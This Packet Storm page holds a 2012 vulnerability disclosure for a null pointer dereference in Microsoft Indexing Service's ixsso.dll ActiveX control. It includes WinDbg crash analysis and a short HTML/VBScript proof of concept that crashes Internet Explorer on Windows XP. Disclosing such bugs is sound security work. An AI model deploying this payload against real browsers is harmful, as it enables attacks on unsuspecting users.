what you don't know can hurt you

Microsoft Indexing Service Null Pointer Dereference

Microsoft Indexing Service Null Pointer Dereference
Posted Aug 24, 2012
Authored by coolkaveh

Microsoft Indexing Service suffers from a server-side (ixsso.dll) null pointer dereference vulnerability.

tags | advisory
MD5 | 91b15636e73787217decec485b2d2a8c

Microsoft Indexing Service Null Pointer Dereference

Change Mirror Download
Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null
pointer dereference
Crash : http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@rocketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@gmail.com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller
-----------------------------------------------------------------------------------------
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]

Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents

Exception Hash (Major/Minor): 0x3716130a.0x43133e77

Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35

Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting
Address controls Code Flow starting at
ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)

The data from the faulting address is later used as the target for a branch.
--------------------------------------------------------------------------------------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024'
id='target' /></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid = "Cisso.CissoQuery"
argCount = 1

Set arg1=Nothing

target.OnStartPage arg1
</script>


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close